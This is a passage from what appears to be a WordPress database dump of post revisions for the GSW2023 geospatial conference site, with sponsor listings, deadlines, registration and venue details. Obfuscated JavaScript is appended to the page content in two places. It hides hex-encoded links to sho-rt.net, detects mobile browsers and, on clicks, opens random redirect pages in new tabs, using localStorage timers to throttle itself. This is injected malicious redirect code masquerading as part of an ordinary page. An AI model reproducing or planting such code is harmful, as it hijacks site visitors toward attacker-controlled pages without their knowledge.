g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:49:02','2023-04-02 02:49:02','',3066,'https://gsw2023.com/?p=4006',0,'revision','',0),
(4007,1,'2023-04-02 02:49:48','2023-04-02 02:49:48','<p>[vc_row][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403737829{margin-top: 130px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 